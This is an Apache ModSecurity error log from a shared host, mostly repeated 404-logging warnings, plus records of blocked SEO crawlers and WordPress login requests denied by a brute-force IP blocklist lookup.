[Tue May 26 17:50:32.652906 2026] [security2:error] [pid 937900:tid 938099] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQEE4hPNS8CpkGLtbOGQAAAMo"]
[Tue May 26 17:50:35.169464 2026] [security2:error] [pid 937900:tid 938095] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQEk4hPNS8CpkGLtbOUgAAAMY"]
[Tue May 26 17:50:35.523154 2026] [security2:error] [pid 937900:tid 938140] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQE04hPNS8CpkGLtbOZgAA814"], referer: https://ndequipments.com/contact-us/
[Tue May 26 17:50:35.523722 2026] [security2:error] [pid 937900:tid 938062] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQE04hPNS8CpkGLtbOZQAApWQ"], referer: https://ndequipments.com/contact-us/
[Tue May 26 17:50:35.717962 2026] [security2:error] [pid 937900:tid 938090] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQE04hPNS8CpkGLtbOagAAwVY"]
[Tue May 26 17:50:35.719399 2026] [security2:error] [pid 937900:tid 938101] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQE04hPNS8CpkGLtbOaQAAzGI"]
[Tue May 26 17:50:36.891473 2026] [security2:error] [pid 937900:tid 938056] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQFE4hPNS8CpkGLtbOfgAAAJ8"]
[Tue May 26 17:50:38.330393 2026] [security2:error] [pid 937900:tid 938025] [remote 51.161.65.78:63736] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "juniorwoodies.com"] [uri "/robots.txt"] [unique_id "ahWQFk4hPNS8CpkGLtbOrgAA4nw"]
[Tue May 26 17:50:38.330631 2026] [security2:error] [pid 937900:tid 938123] [client 51.161.65.78:63736] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "juniorwoodies.com"] [uri "/robots.txt"] [unique_id "ahWQFk4hPNS8CpkGLtbOrgAA4nw"]
[Tue May 26 17:50:39.293862 2026] [security2:error] [pid 937900:tid 938036] [client 85.208.96.207:11410] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWQF04hPNS8CpkGLtbOyAAAAIs"]
[Tue May 26 17:50:39.294003 2026] [security2:error] [pid 937900:tid 938036] [client 85.208.96.207:11410] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWQF04hPNS8CpkGLtbOyAAAAIs"]
[Tue May 26 17:50:39.710908 2026] [security2:error] [pid 937900:tid 938073] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQF04hPNS8CpkGLtbOxwAAALA"]
[Tue May 26 17:50:39.829562 2026] [security2:error] [pid 937900:tid 938000] [remote 142.44.233.131:40172] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "juniorwoodies.com"] [uri "/"] [unique_id "ahWQF04hPNS8CpkGLtbO1QAAv2M"]
[Tue May 26 17:50:39.829766 2026] [security2:error] [pid 937900:tid 938088] [client 142.44.233.131:40172] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "juniorwoodies.com"] [uri "/"] [unique_id "ahWQF04hPNS8CpkGLtbO1QAAv2M"]
[Tue May 26 17:50:41.485554 2026] [security2:error] [pid 937900:tid 938086] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQGU4hPNS8CpkGLtbO8AAAAL0"]
[Tue May 26 17:50:43.712484 2026] [security2:error] [pid 937900:tid 938135] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQG04hPNS8CpkGLtbPMAAAAO4"]
[Tue May 26 17:50:43.899568 2026] [security2:error] [pid 937900:tid 938006] [remote 94.76.235.103:57026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWQG04hPNS8CpkGLtbPOgAAqWk"]
[Tue May 26 17:50:45.009171 2026] [security2:error] [pid 937900:tid 938132] [client 94.23.188.213:23826] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "koiralalogistics.com"] [uri "/robots.txt"] [unique_id "ahWQHU4hPNS8CpkGLtbPWwAAAOs"]
[Tue May 26 17:50:45.009335 2026] [security2:error] [pid 937900:tid 938132] [client 94.23.188.213:23826] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "koiralalogistics.com"] [uri "/robots.txt"] [unique_id "ahWQHU4hPNS8CpkGLtbPWwAAAOs"]
[Tue May 26 17:50:45.836875 2026] [security2:error] [pid 937900:tid 937954] [remote 213.171.208.232:45726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWQHU4hPNS8CpkGLtbPcQAAhzU"]
[Tue May 26 17:50:46.221785 2026] [security2:error] [pid 937900:tid 938068] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQHU4hPNS8CpkGLtbPdAAAAKs"]
[Tue May 26 17:50:46.374020 2026] [security2:error] [pid 937900:tid 938084] [client 15.235.98.143:52076] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "koiralalogistics.com"] [uri "/"] [unique_id "ahWQHk4hPNS8CpkGLtbPhQAAALs"]
[Tue May 26 17:50:46.374121 2026] [security2:error] [pid 937900:tid 938084] [client 15.235.98.143:52076] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "koiralalogistics.com"] [uri "/"] [unique_id "ahWQHk4hPNS8CpkGLtbPhQAAALs"]
[Tue May 26 17:50:48.385689 2026] [security2:error] [pid 937900:tid 938086] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbPxwAAvQg"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.396700 2026] [security2:error] [pid 937900:tid 938082] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbPyAAAuRA"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.400867 2026] [security2:error] [pid 937900:tid 938040] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbPyQAAj00"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.579868 2026] [security2:error] [pid 937900:tid 938134] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP8gAA7Sw"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.587057 2026] [security2:error] [pid 937900:tid 938067] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP2AAAqg8"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.590651 2026] [security2:error] [pid 937900:tid 938083] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQBAAAui0"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.591853 2026] [security2:error] [pid 937900:tid 938123] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP7gAA4hk"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.605784 2026] [security2:error] [pid 937900:tid 938074] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP6wAAsSI"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.608227 2026] [security2:error] [pid 937900:tid 938093] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP5gAAxCQ"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.614496 2026] [security2:error] [pid 937900:tid 938088] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQAQAAv0E"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.615124 2026] [security2:error] [pid 937900:tid 938113] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP0AAA2Ds"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.618972 2026] [security2:error] [pid 937900:tid 938033] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP2gAAiG4"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.622263 2026] [security2:error] [pid 937900:tid 938038] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP6gAAjSk"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.624406 2026] [security2:error] [pid 937900:tid 938059] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP8AAAoh8"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.626029 2026] [security2:error] [pid 937900:tid 938069] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP8wAArC8"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.632886 2026] [security2:error] [pid 937900:tid 938015] [remote 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP3AAAhnI"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.639775 2026] [security2:error] [pid 937900:tid 938077] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP7AAAtCU"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.641247 2026] [security2:error] [pid 937900:tid 938096] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP3wAAx28"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.647759 2026] [security2:error] [pid 937900:tid 938132] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQBQAA6z4"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.647879 2026] [security2:error] [pid 937900:tid 938147] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP9QAA-iE"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.648339 2026] [security2:error] [pid 937900:tid 938043] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP1QAAkjY"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.648838 2026] [security2:error] [pid 937900:tid 938062] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP_gAApUQ"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.650235 2026] [security2:error] [pid 937900:tid 938111] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP6QAA1h4"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.652589 2026] [security2:error] [pid 937900:tid 938104] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP1AAAzxQ"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.654046 2026] [security2:error] [pid 937900:tid 938013] [remote 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP2wAA4HA"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.656356 2026] [security2:error] [pid 937900:tid 938115] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP0QAA2m0"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.671974 2026] [security2:error] [pid 937900:tid 938137] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP-QAA8EU"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.674832 2026] [security2:error] [pid 937900:tid 938090] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP0gAAwQM"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.675319 2026] [security2:error] [pid 937900:tid 938120] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP4QAA3w0"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.675580 2026] [security2:error] [pid 937900:tid 938154] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP_QABASo"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.682368 2026] [security2:error] [pid 937900:tid 938105] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP1gAA0BY"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.691056 2026] [security2:error] [pid 937900:tid 938014] [remote 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP3QAA4XE"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.693096 2026] [security2:error] [pid 937900:tid 938063] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP9AAApic"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.703733 2026] [security2:error] [pid 937900:tid 938139] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP7QAA8lk"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.705170 2026] [security2:error] [pid 937900:tid 938047] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP9gAAliM"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.705306 2026] [security2:error] [pid 937900:tid 938081] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP8QAAuCA"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.705507 2026] [security2:error] [pid 937900:tid 938103] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQBwAAznQ"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.705931 2026] [security2:error] [pid 937900:tid 938125] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQAAAA5Ec"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.706209 2026] [security2:error] [pid 937900:tid 938080] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQCgAAt0g"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.707964 2026] [security2:error] [pid 937900:tid 938055] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP3gAAnhI"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.711080 2026] [security2:error] [pid 937900:tid 938152] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP9wAA_x0"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.717940 2026] [security2:error] [pid 937900:tid 938136] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQDAAA71I"], referer: https://ndequipments.com/used-tractors/
